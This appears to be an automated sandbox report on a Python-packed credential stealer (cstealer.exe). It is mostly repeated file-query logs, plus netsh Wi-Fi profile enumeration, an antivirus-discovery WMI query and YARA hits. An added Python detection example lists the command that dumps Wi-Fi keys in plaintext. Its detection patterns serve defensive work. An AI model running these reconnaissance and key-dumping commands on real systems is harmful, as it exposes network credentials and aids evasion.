                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Code function: 3_2_00000271DC677960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00000271DC677960
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Code function: 3_2_00007FF695806DCC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF695806DCC
                                Source: C:\Users\user\Desktop\DevxExecutor.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                Lowering of HIPS / PFW / Operating System Security Settings

                                Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\wbem\WMIC.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
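The two events above are the ones a detection engineer would most want to alert on from this section: `netsh wlan show profile` enumerates saved Wi-Fi profiles (and with `key=clear` dumps the pre-shared key in plaintext), and a query for AntivirusProduct in root\SecurityCenter2 is the standard way a stealer discovers which AV is installed. The following is an added example, not part of the Joe Sandbox report, showing process-creation detection logic for both behaviours run over constructed, Sysmon-style sample events. The command lines in the sample set are constructed; note that the report records the WMI call at API level (ExecQuery), so a command-line rule like this one only fires when the query is issued through WMIC or PowerShell, not when the stealer calls the WMI COM interface directly.

```python
"""Process-creation detector for Wi-Fi profile harvesting and AV-product
discovery. Added example; the sample events are constructed, not taken
from the sandbox report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 shape: image, parent image, command line."""
    image: str
    parent_image: str
    command_line: str


# Constructed sample telemetry mirroring the parent/child shapes seen above.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\netsh.exe", r"C:\Windows\System32\cmd.exe",
              "netsh wlan show profile"),
    ProcEvent(r"C:\Windows\System32\netsh.exe", r"C:\Windows\System32\cmd.exe",
              'netsh wlan show profile name="HomeWiFi" key=clear'),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
              r"wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName"),
    ProcEvent(r"C:\Windows\System32\netsh.exe", r"C:\Windows\explorer.exe",
              "netsh interface show interface"),          # benign netsh use
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
              "wmic os get caption"),                     # benign WMIC use
]

# "profile" and "profiles" both list saved WLAN profiles.
WLAN_PROFILE_RE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)
# key=clear makes netsh print the PSK in plaintext under "Key Content".
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.I)
# Namespace and class may appear in either order (wmic vs. Get-WmiObject/Get-CimInstance).
AV_QUERY_RE = re.compile(
    r"securitycenter2.*antivirusproduct|antivirusproduct.*securitycenter2", re.I | re.S)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev):
    """Return (rule_name, severity) for a suspicious event, else None."""
    img = _basename(ev.image)
    cl = ev.command_line
    if img == "netsh.exe" and WLAN_PROFILE_RE.search(cl):
        # Listing profiles is reconnaissance; key=clear is credential access.
        return ("wifi_profile_enum", "high" if KEY_CLEAR_RE.search(cl) else "medium")
    if img in ("wmic.exe", "powershell.exe", "pwsh.exe") and AV_QUERY_RE.search(cl):
        return ("av_product_discovery", "medium")
    return None


def scan(events):
    """Apply classify() to every event; return (rule, severity, parent, cmdline) hits."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result is not None:
            rule, severity = result
            hits.append((rule, severity, _basename(ev.parent_image), ev.command_line))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The parent image is carried through in each hit because the same netsh command launched interactively by an administrator and launched from a cmd.exe child of a freshly dropped executable in %TEMP% deserve very different triage; in a real pipeline the parent's own ancestry, not just its name, is what separates the two.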

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.2290157848.0000020710C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, type: DROPPED
                                Source: Yara matchFile source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2292462578.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005C.00000003.2565952065.00000239F3175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2289697858.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
